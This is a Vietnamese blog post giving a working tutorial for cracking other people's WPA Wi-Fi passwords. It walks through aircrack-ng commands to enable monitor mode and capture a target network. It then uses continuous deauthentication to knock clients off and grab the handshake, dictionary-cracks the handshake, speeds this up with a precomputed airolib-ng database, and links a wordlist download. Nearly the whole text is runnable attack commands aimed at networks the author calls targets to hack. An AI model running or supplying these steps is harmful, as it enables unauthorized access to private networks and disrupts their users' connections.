Các bước tiến hành như sau :
1, bật 1 cửa sổ lệnh và gõ :
iwconfig (cái này để xem các card trong máy).
airmon-ng ( để xem máy mình có card wifi hỗ trợ trong Backtrack ?).Nếu không có thì thôi,khỏi hack lun.
airmon-ng stop wlan0 (interface của card tương thích hiện ra trong lệnh airmon-ng trên).
ifconfig wlan0 donw (không có bước này thì không chạy được đâu nhá!).
ifconfig wlan0 up
airmon-ng start wlan0
airodump-ng mon0 (mon0 là monitor interface của wlan0 sau khi thực hiện lệnh airmon-ng start wlan0).
2, mở 1 của sổ lệnh khác gõ :
airodump-ng --bssid BSSID -w wpafile -c CH mon0
( BSSID là MAC tương ứng với wifi mình định hack,hiên ra ở bảng airodump-ng mon0.
wpafile là tên 1 file mình đặt để nó tạo ra file .cap cho mình.
CH là channel tương ứng với cột CH hiện ra ở bảng airodump-ng mon0 của wifi mình định hack )
aireplay-ng --deauth 0 -a BSSID -c STATION mon0 (gửi đi liên tục các gói tin để thu được WPA handshake ,có thể phải thực hiện vài lần lệnh này cho đến khi nó chạy liên tục).
3. Chuyển sang cửa sổ của lệnh airodump-ng mon0,chờ đến khi xuất hiện dòng WPA handshake thì dừng lại bằng cách ấn CTRL +C.rồi gõ lệnh :
aircrack-ng -w /đường dẫn đến file passwordlist/password.lst /đường dẫn đến file wpafile-01.cap/wpafile-01.cap (thường là /root/wpafile-01.cap ;wpafile chính là tên tương ứng với lên airodump ở trên ;password.lst là file có chứa từ điển pass , mình phải download trên mạng về,có thể là file .text hoặc .dic)
Bây giờ ngồi chờ báo KEY FOUND thôi. :d.
Tuy nhiên cách này rất lâu, chỉ dò được khoảng 900key/s.
Có cách khác nhanh hơn có thể dò được khoảng 30000-40000key/s .Đó là tạo database cho Backtrack.Làm như sau :
- Các bạn mở thêm 1 cửa sổ lệnh khác, gõ :
airolib-ng crackwpa --import essid /đường dẫn/essid.txt(essid.txt là file có chứa SSID(tên hiện ra) của wifi mình hack ; crackwpa là tên database mà mình sẽ tạo ra).
airolib-ng crackwpa --import passwd /đường dẫn/password.lst
airolib-ng crackwpa --batch ( kết hợp essid và password.lst , sẽ phải đợi hơi lâu để hoàn thành).
aircrack-ng -r crackwpa wpa*.cap (bây giờ tốc độ dò lên đến 30000k/s ). :d
Cái này phải phụ thuộc rất nhiều vào file password.lst ,nếu nó không chứa pass của wifi thì chịu chết k hack được.
các bạn có thể dowload file password.lst tại đây:
http://www.ziddu.com/download/21137724/huge_wordlist.rar.html
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment